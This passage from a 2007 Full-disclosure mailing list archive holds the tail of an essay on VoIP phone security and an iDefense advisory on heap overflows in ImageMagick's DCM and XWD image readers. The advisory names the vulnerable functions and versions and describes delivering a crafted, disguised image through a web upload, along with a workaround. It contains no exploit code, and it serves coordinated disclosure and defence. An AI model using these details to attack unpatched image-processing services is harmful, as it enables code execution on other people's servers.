Typical Answer: "VLANs. VoIP phones way inside the perimeter and untouchable. Nothing to see here. Move along. Last call. Thanks for stopping by."

Perhaps not...

Unfortunately, somehow essential security concepts, for example, "attackers will target your weakest points" and "attacker physical access can very well equal game over", seem largely absent from the dialog when it comes to the security posture of many VoIP phones (wifi, desktop, dual-mode). The evident issues thus far, from basic stability to über-l4m3 low-hanging fruit, are the proverbial canaries in the coal mine; a love-tap compared to the beating looming on the horizon unless lots more folks with skin in this game get "eyes on target" to past, present and emerging risks/threats/vectors/mitigation/security QA, etc.

Clearly the gloves are coming off, and it's not a stretch to imagine something, oh say, as obscure as the forthcoming Apple iPhone (or several) up for "PWN to OWN" right next to the Mac laptops (and who knows what else) at some security conference soon, perhaps this summer in that quaint and charming little desert town? Hrm, if Apple wanted to "reach out to the security community" I suppose DR might consider penciling in some time at CanSecWest for an iPhone lovefest [1].
After all, didn't Window Snyder recently mention something about who in the game these days seems to 0wn the little things that mean so much, like "power" and "control" and "time" [2]? Maybe the "lumps now better than lumps later" approach is a feasible tactic and makes good business sense? Eh, what do I know? Were I really smart I would've learned how to play golf and gone into marketing.

Nevertheless, as with any gear, be it a hillbilly-armor Humvee or VxWorks Mars Lander, time will tell if VoIP phones, and recent/upcoming emergency communication offerings, are up to the challenge and can truly "cut the fog" of chaos when the sh*t hits the fan. I really hope that when the rubber tires on all those fancy Jack Bauer wannabe Suburbans [3] hit the road and get to where they need to go, that the packets also hit the wire the way they should, and the right people get the right information at the right time so they can make the right decisions... you know, like it happens on 24.

So as we chuckle away yet another April Fools' Day, with many of us sitting in comfy homes with full bellies, waiting for our $700 Playstation 3 to catch fire and burn the house down (just wait until they start getting dusty - "dude, is that smoke?"), I humbly suggest that we try to understand the true costs and implications of security/quality issues affecting VoIP phones, and of course all the other pieces of this shifting, opaque puzzle of madness and amusement.

Requisite bottom line: VoIP phones have emerged as a critical tool that's going into people's hands in demanding situations when communication matters most and circumstances are the least forgiving. There must be clear, tangible, and enforceable obligations in conjunction with truly independent and on-going security evaluation to ensure mission-critical VoIP phones are resistant to real-world attacks.
Failure to take decisive action may very well end up costing more in human misery and property loss than the proactive investment to ensure a reasonably secure posture in VoIP phones.

Btw, thanks for sharing the new VoIP security tools at your site, and we'll get them added asap to the VOIPSA VoIP Security Tool List :-)

Kind regards,
--scm

Shawn Merdinger
Independent Security Researcher
voipninja.com

Notes:
[1] Voipninja.com is accepting sponsorship of Voipninja research staff to attend select conferences - potential ROI/deliverables include trip report, out-brief, and respectable bar tabs
[2] http://news.zdnet.com/2100-1009_22-6170219.html
[3] http://cms.firehouse.com/content/article/article.jsp?sectionId=46&id=54007

From labs-no-reply at idefense.com Mon Apr 2 16:52:29 2007
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Mon, 02 Apr 2007 11:52:29 -0400
Subject: [Full-disclosure] iDefense Security Advisory 03.31.07: Multiple Vendor ImageMagick DCM and XWD Buffer Overflow Vulnerabilities
Message-ID: <461126BD.3020302@idefense.com>

Multiple Vendor ImageMagick DCM and XWD Buffer Overflow Vulnerabilities

iDefense Security Advisory 03.31.07
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 31, 2007

I. BACKGROUND

ImageMagick is used as a suite of image manipulation tools (animate, composite, conjure, convert, display, identify, import, mogrify, and montage) which are sometimes used by other applications for processing image files. For more information about ImageMagick visit the following URL.

http://www.imagemagick.org/

II. DESCRIPTION

Remote exploitation of several buffer overflow vulnerabilities in ImageMagick, as included in various vendors' operating system distributions, allows attackers to execute arbitrary code with the credentials used for image processing.

An integer overflow exists in ImageMagick's handling of DCM (Digital Imaging and Communications in Medicine) format files which allows an attacker to cause a heap-based buffer overflow.
This vulnerability specifically exists in the ReadDCMImage() function.

Two integer overflows exist in ImageMagick's handling of XWD (X Windows Dump) format files that allow an attacker to cause a heap-based buffer overflow. The vulnerabilities specifically exist in the ReadXWDImage() function. An integer overflow could occur when calculating the amount of memory to allocate for the 'colors' or 'comment' field.

III. ANALYSIS

Exploitation of these vulnerabilities allows attackers to execute arbitrary code in the context of the user that started the affected program. Since the tools that are part of ImageMagick are sometimes used as helper tools by web applications, this user may be the same as the httpd user.

To exploit these vulnerabilities, an attacker would need to get a maliciously constructed image file processed by one of the affected applications. This could be accomplished by uploading to a web application or using social engineering tactics. While neither aforementioned format is widely used, ImageMagick does not determine the file type by its extension, allowing it to be disguised as another file type.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in ImageMagick version 6.3.x. Additionally, the source code for versions 6.3.1, 6.3.2, 6.3.3-3 and 6.2.9 contains the affected code. It is suspected that earlier versions of ImageMagick are also vulnerable.

V. WORKAROUND

Exposure to these vulnerabilities can be mitigated by moving or deleting the DCM and XWD module files from the ImageMagick modules directory. However, this will remove support for these image formats altogether.

VI. VENDOR RESPONSE

The ImageMagick maintainers have addressed these vulnerabilities in version 6.3.3-5 of ImageMagick.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

02/28/2007 Initial vendor notification
03/20/2007 Initial vendor response
03/31/2007 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From dave at immunityinc.com Sun Apr 1 20:42:17 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 01 Apr 2007 15:42:17 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local